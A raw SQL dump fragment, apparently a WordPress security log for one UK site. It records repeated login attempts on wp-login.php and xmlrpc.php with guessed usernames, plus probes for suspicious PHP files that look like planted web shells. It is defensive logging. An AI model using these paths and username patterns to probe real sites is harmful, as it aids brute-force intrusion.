gNvwX5mAYpuIGPl','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857045.1801,71,'hV7CItJLwo5AO1mvTnEf8xck','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857045.4690,50,'G6zRANKIHxXwoChvpbkYEDn8','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857106.0828,71,'60rB7zaecZuEtT3JvxfAyM4N','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857106.3840,50,'iIjcx8BlH3OFPqY260ELGfXW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('208.109.8.126',3496806526,'admin',0,1629857126.0930,152,'KloOZXNeLwjvR3JDCUVifAmE','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857167.3271,71,'2xXENVTrIAmkQyFlwqJ3Oavg','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857167.6314,50,'OysbCmhNYv0wXAMHEIc1t3So','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857228.1993,71,'3LnUrIozWZRYbTcESy0V5C2X','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857228.4716,50,'0Xp8ulfSQPHb951vY63CWnJa','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857290.2038,71,'vROmabLl5nc9DxBGTZks4HNX','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857290.5173,50,'iWNcpL1bwP8duDETGzUjHCKQ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857350.1650,71,'IDt6Q7LaYyXT2OwPxJ9gSunp','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857350.4534,50,'03Wb1DrdwRPG98K56nflLUVO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.63.170',1805008810,'westonspirit',0,1629857402.3805,51,'yQATBP7Wj6fgaeqlo9n0Grim','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857411.4307,71,'Fwi19cmtWMaTkLYZd2IN4Spe','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857412.0295,50,'lcR9ZVdwxC6F0zQaLy73mqnK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857472.6271,71,'c6IEYGvSkHZVr180AoKgjwfs','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857472.9859,50,'T6brnFzIXw1A4V5B0af9pycU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('147.139.136.124',2475395196,'admin',0,1629857519.3090,152,'nMKYL7lAZeHdRXfczvyJxwuP','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('142.54.177.3',2385948931,'uk',0,1629857524.4040,51,'db3s9DRCSNYa2yXHjg4mqT6w','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857533.6077,71,'GuvFlKzj09owmnhqcVJMr6bN','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857533.9530,50,'nNvIPqwZsXh9Hb0pTWVtYBg7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('181.143.205.4',3046100228,'',0,1629857594.1062,71,'0fBrzxvW3HXa4utIpJqYPLAO','','13|0|0|0|westonspirit.org.uk/xmlrpc.php'),('181.143.205.4',3046100228,'',0,1629857594.4547,50,'3TkuCeQBNq2AmtS9OEr1Rjsd','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.63.170',1805008810,'org',0,1629857808.8566,51,'6xnUXEG7TkH2cYJ8AdOVlmhy','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('103.142.25.112',1737365872,'admin',0,1629857915.1239,152,'crCB3y1ZqYmnlSA2oOf6JuMQ','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('186.64.119.225',3124787169,'admin',0,1629858322.3978,152,'E34MB0KIOmokZfq1LDveQN67','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('192.163.198.248',3231958776,'admin',0,1629858707.6465,152,'ACHxBuRGhQbp9oOYWjScwK5D','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('103.147.10.253',1737689853,'admin',0,1629859087.5560,152,'zHSG0VdwMnABtFc6NOf1rQPX','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('186.64.116.65',3124786241,'admin',0,1629859463.7513,152,'qyx9ARHw3ecoJkFlrW4NDnEt','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('107.161.177.10',1805758730,'admin',0,1629859887.0451,152,'6rLTQjo1gBX2xyKCSFcZsEwh','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('115.65.255.188',1933705148,'',0,1629859961.5858,55,'EtvCVPOGwI4JHshZ91kfX75U','','19|0|0|0|www.westonspirit.org.uk/about.php'),('220.84.215.92',3696547676,'',0,1629859965.6212,55,'YOqhAKnx9lfDENuPV76sHGzW','','19|0|0|0|www.westonspirit.org.uk/about.php'),('112.214.17.112',1893077360,'',0,1629859970.1278,55,'8hxrEZYSNda5HiKIkPzgyqsW','','19|0|0|0|www.westonspirit.org.uk/about.php'),('1.220.1.78',31195470,'',0,1629859975.2911,55,'SCbiK3OnjWmqYsPzuMJ2Gf6w','','19|0|0|0|www.westonspirit.org.uk/about.php'),('175.118.235.4',2943806212,'',0,1629859994.9729,55,'H5k3PlTIWDKxnO1024adcbuw','','19|0|0|0|www.westonspirit.org.uk/wp-includes/js/dist/index.php'),('221.124.2.19',3715891731,'',0,1629860011.2198,55,'drRm8ynvAgaBcTotOQZE0NMf','','19|0|0|0|www.westonspirit.org.uk/wp-includes/js/jcrop/radio.php'),('118.220.132.20',1994163220,'',0,1629860030.9191,55,'LJ7nQUjpyRCVct6O13aPuo5q','','19|0|0|0|www.westonspirit.org.uk/wp-includes/js/crop/content.php'),('103.86.176.93',1733734493,'admin',0,1629860274.4572,152,'yIv8RxJjkp1hSrmbPDeBwst3','','0|0|0|0|westonspirit.org.uk/xmlrpc.php'),('107.150.45.58',1805004090,'westonspirit',0,1629861040.2201,51,'wagNGcIC6MyuAqkm5ZYhipR4','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('5.188.62.76',96222796,'westonspirit',0,1629862203.8694,51,'iKAaSzF8DdCobI7kZXjmxyrq','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629864904.5817,51,'PaLTsHwrZE9ItzbqWeUMY0xK','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629864965.4360,51,'Mwv4rmecN3dIxj2Su1qQChDF','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629865086.9340,51,'ZriUYGy1F4PC9eTNoQX8HuzO','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('144.34.166.150',2418189974,'',0,1629866900.4013,55,'2F5CsyUSnwJmPWzMNLcqOprK','','19|0|0|0|westonspirit.org.uk/wordpress/wp-content/plugins/xnxx/noob.php'),('144.34.166.150',2418189974,'',0,1629866904.7119,55,'63yEcsrmgRBJVQqzSHI80Zx4','','19|0|0|0|westonspirit.org.uk/wordpress/wp-content/plugins/xnxx/noob.php'),('69.30.244.20',1159656468,'admin',0,1629868635.3247,7,'gu3MJfZebzG0jNq8Khy61cDC','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.177.3',2385948931,'westonspirit',0,1629869038.6182,51,'saryFbXJhoGzc3UZ9k47mOe1','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.177.3',2385948931,'uk',0,1629869105.2827,51,'d0cUgkLtoHRAy3uhwrsMDqZY','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.45.58',1805004090,'org',0,1629869511.7015,51,'cmiF2er1Yq0J9XyusxPSdQnN','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('192.151.144.59',3231158331,'westonspirit',0,1629869837.2348,51,'YcmGRM7Ofixs1TuXIvHCyAgJ','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629871370.7536,51,'eN1mLSV6zQKbOYxy7adRc805','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629871439.3684,51,'ZTMGk6oyFxU7NCDg0WAPzEXe','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629871500.3702,51,'caOu3gwZ6Mn8Qb5SG7jCUtE4','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629871561.3155,51,'S9ejVvWb4osa10YmQlqREikK','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629871622.2779,51,'34czmqf2XTsWNu05yopwUZxH','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871622.3000,10,'34czmqf2XTsWNu05yopwUZxH','','701|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871683.7920,50,'MWi5Xvn6HZSmAe47sbTrOoJR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871744.2819,50,'4WGL1OcpPVvgaDRx9CytmQMn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871805.2710,50,'tA4J3deYDVxTLvahXjzbfsCy','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871866.2578,50,'V5FuMXIhYgaAfkOoevBrPN3K','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871927.2463,50,'oXV7LYi3G4jNBQmA80tPlpkZ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629871988.8814,50,'pxt4TLaGh15e68suPDFCfjly','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872049.3598,50,'udr20DnUlvz9hQ6K1Rst3fim','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872110.2992,50,'yplEKYhwRMQPq5SsH1zfZ30t','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872171.1637,50,'o0EpMWt2YAqmZzwHBkXsLjcl','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872232.2758,50,'lC2EOdRoINa50TZcXM8ui3xe','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872293.8187,50,'XT90iufeMqYjG3Hb4dcSyohO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872354.1637,50,'1Gbr2IBYTc8lNsxMmCRVvqHF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872415.5471,50,'NWV1aRUcoAYj9uL05Qr7Jbvn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872476.1464,50,'RyerlxLTQEghwzb4HJD7ja18','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872537.2558,50,'hVPiNIJMLD4Sge2Zbasn51RE','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('5.188.62.76',96222796,'westonspirit',0,1629872563.0763,51,'F213parvZAnCfoDwW6KuI8Lb','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872599.1193,50,'CjRu85ewsHQOdnWBAYP4LxXU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872659.1979,50,'SgKlwCqo52VZJWUBLEA3zpMt','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872720.2577,50,'zwxOdtTAiLSEuoaHCr3W9pXe','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872781.2218,50,'9aGnfdbjl4eEAvIqw76RoQUp','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872842.1397,50,'hpx2sYPQOcWo1LidD8g0CvtB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872903.8793,50,'1w9h462vdCOPDQTZtfRpJ8as','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.244.20',1159656468,'uk',0,1629872906.1470,51,'FM8YJRTdAStZkaI0Qr1hUHBy','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629872964.2503,50,'FhUujCpASVIGE6J5HQMmdgvq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873025.2039,50,'AG2uh8b09DPZgmUfsEtjBWOJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873086.3037,50,'jba8oOliRWxdUyKgcHq7fnCp','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873147.3266,50,'Y9WV6gXw21jdeDCb0F8kuzaM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873208.9314,50,'6pdbs4HMh5oJi8yIewXvl71R','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873269.2351,50,'2JjkVqegLlmf3Pacv1DHBzhW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873330.1955,50,'c293rAdFswlxWqLY1Rn6iomJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873391.2117,50,'bJx7X3i0HAzryhYBQ2VcSl59','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873452.2443,50,'aIBbmQ4nHPqZpSrgD2cNxeOw','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873513.7003,50,'Qo5Tm6dA2z3VUrW89F1Z4wgq','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873574.2703,50,'DeS5a8LPydU9ziKQAVG42Ywo','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873635.2289,50,'J2qoU9BORQ5SVsgA87tHpYaI','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873696.9025,50,'iPdKqbxTm45VaSroN3pGQLBs','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873757.3234,50,'ZgJuQNADwv051bcyHFIYm4sk','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873757.3276,50,'Sxe85FshuRncz4Q2JTCVo6Y9','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873818.6965,50,'o2lsen9uHZJBRcyUWASNTCGO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873879.2920,50,'YmqaksdVjgpl7uESLfACKPc3','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629873940.2006,50,'xfQ0pk4sH8Big6IzouE9rNTe','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874002.9235,50,'EOJCepF3zrld68hLfQBgvYIn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874064.2891,50,'RmqtvzsgESWZjrQ3PBGwHxJT','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874124.5709,50,'knizScrKVytYOA9lWRXIv5w3','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874185.3120,50,'W9FkbxvhSaE3Tmq7Y6GXu1H2','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874246.3755,50,'2fsp0drSuFm8JPCjBAO3ZEiY','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874307.5607,50,'cAPUhNK8tf9akpqjZvw5zuo3','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874368.4111,50,'SRuxF8hw2WoEIeCNJi1l3bnP','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874430.5044,50,'1d0JSHGKTxYh5FNgwLuUODIB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874490.4026,50,'bgs6SnPO4fDXLMuajKkq1IvA','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874551.3403,50,'An6FdXNGT01Bgj9CewV4Hs5o','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874612.2202,50,'3uwxrDNIaKCY0WZvpiBORU59','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874673.4049,50,'0vaZqO64i8kMG9bsHjEzlILB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874735.4839,50,'dikzElRruJN4B5cpt0XZQqnb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874795.5097,50,'pG1TPu3zmR5x2lUykN7WgtbB','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874856.1889,50,'0JR1npD7QWsmaeXYtEbwKNgF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874917.2143,50,'d6FfA8xKMRvJVEYBlG30tCST','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629874978.3922,50,'XDVUS6J30mpROMAy2bWoHPLg','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875040.1113,50,'5xAX9c8Qwn0CjHMIZlky7pFi','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875100.2140,50,'SWngs7PDr45e1ANqoaxGpKdb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875161.4170,50,'CnXzOqV6D0LjGEYgBpPbrfla','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875222.2287,50,'cDkXHLPJatsQg51C7UdBGW6w','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'westonspirit',0,1629875284.0284,51,'gRIci8CBsHfmJt3eYpadD9Nz','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875284.0407,10,'gRIci8CBsHfmJt3eYpadD9Nz','','707|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875344.6361,50,'ZqGmPduisNxMTtI3CgERn9O4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875405.7470,50,'Jl47DBUOFpY3PeKoqa6tIvNr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875466.3915,50,'8dBgSswEkcRJlMjzmGFpbHq7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875527.3681,50,'dnVhBvZbT9Is17Jkxm5qQaXy','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875588.2867,50,'eDXfaZjWE2lrFPmd1UGqCu8Y','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875649.7590,50,'gbZaK69U5Hf41lu2zxhEYcTP','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875710.1859,50,'tzmYeQH4ROJGr8gqZNBd7wik','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875771.2306,50,'ZikCF0WTO9PQUfXnGhHNJY13','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875832.2142,50,'DoS9QvsFdRcMBAqxpKT8WI5h','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875893.4160,50,'bvszZN8ki9710FrJfnm6AxIM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629875954.6553,50,'mK2BkFUyDwV0WApHf5Ov7zJi','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876015.6290,50,'92Q5vgM0dkuipXYCz8OnrwJt','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876076.2571,50,'2OiVQEcIFD8pS9WrCmyBMPnw','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876137.2228,50,'iLefMK94FZopsB2wW6kNzADl','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876198.2624,50,'JlmxXNgVWRa8Zpz9cskj534d','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876260.2350,50,'B7NDanUy21bwJpt6G3Mml4zA','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876320.3231,50,'yk8rQTb7hqiwn5oGEUY09gzN','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876382.2657,50,'tlivIAq0aFWmeTVSrg9R6Chy','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876442.3534,50,'QUyRj7B5CEAniv6LZSbK2rmc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876503.2389,50,'7oDQck45LOuzMPB6qdsgCR8T','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876565.5867,50,'VA4E7y3WcwfYLUhQ5lxzFuaj','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876625.2052,50,'X8lxva30EMnV5czZTKJOqDmu','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.59.246',1805007862,'westonspirit',0,1629876642.8961,51,'R1P8xTCO9K3ytiq60LQuEwYb','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876686.2501,50,'HWSXCh04Anum7bgYLs6vftGr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876748.0615,50,'bVDGp8aQdLqKeWt9fE6gMzR4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876808.4264,50,'uADiTRGUeafnB6wX4kCxJ5NV','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876870.8060,50,'Puk3yZN7Q6YXWC9inKqLgwoS','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876931.1995,50,'UFLBDKe5bQw4jk0MzGZrHo9x','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('192.151.145.141',3231158669,'org',0,1629876990.5703,51,'bVsFYL9kJMy6B4h8r0nTZiE1','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629876991.2248,50,'kdWLfMtHOJTZXVoyvzlc4rnR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877052.3063,50,'uIY08MAsmvdBKhSJk9iLqn7H','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877113.2760,50,'l3VifWD1RHZjBhyU9qT5PMGa','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877174.9432,50,'aK7tFSDip2N0UPAf6XWokJCl','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('192.151.145.141',3231158669,'uk',0,1629877190.6466,51,'pwnhquWbcgdVvYQoez3M5T16','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877235.1899,50,'YOzg9WrTvuopXK3yG6Pf0xRZ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('192.151.144.59',3231158331,'admin',0,1629877247.0709,7,'ZHaGsnctXihKe38opkbgvRCW','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877296.4655,50,'3x1gmCXR5KqYyAzo8DLw2elb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877357.3299,50,'sydo8QVIwr0kLW3XZv4DheAG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877418.3117,50,'O79HCnKVXlTSDdUkxMc8Autb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877479.8180,50,'4S8ZTP6l5ygct9LvFbBMnWNw','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877540.3583,50,'Sus3Ra4UBHwXTbhN2lgoVn7f','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877601.4247,50,'KdjAFVSt8OsCD2o3qxeGacPu','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877662.3082,50,'EjpnS0maPsq1gHGcYQtV4RZz','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877723.2651,50,'31HNnDrJeE7jlSvR2AOsVxaF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877785.2962,50,'hAVebd1HSt9XqCg8BYIDkN5R','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877845.2491,50,'XCIt3mwngFiDx8hkczGP5OvR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877906.4895,50,'uFAz387ht4rUiYqLHy0xNWme','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629877967.2253,50,'vyXQWeVilKO8M03PZEgmzt7c','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878028.3462,50,'zY5i1ZPgjyD4hINQ02pG78Kx','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878089.6825,50,'Wzl1INV3TbnK5867A0QPsHX4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878150.2909,50,'t2lZQTuFIrmciEd0UpYW1bGL','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878211.1840,50,'IdvbnrpSA4ZmzR2clt0C9UHa','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878272.2507,50,'VjXt2pRBEIe6vNM4hHiKxYFu','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878333.3074,50,'SCAfuapQ07nk38oHqUVP6zcY','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878395.0152,50,'FgZXwtUaiElqs9mfV8zQh0cA','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878455.6183,50,'j0ZVtvR59AmPgqB2nuiDCHFT','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878516.2927,50,'2eTc6LEwWfJ71VG4jxF3mlYr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878577.1855,50,'wisHZS40hfXDlQcndm1TPqgK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878638.2928,50,'cAWU0i5pO4FrvkYgxEy3qZHJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878699.8355,50,'aUmAdlWPO3ELroFJK8pgC76N','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878760.2543,50,'ONjo0fDwHmgqS7JiksG2z1hX','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878821.2600,50,'WgKw94YfeSvQu8lsByZn5qGP','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629878882.3379,50,'WVR9v4qPfGByKx0NrpdcMZmU','','13|0|0|0|westonspiri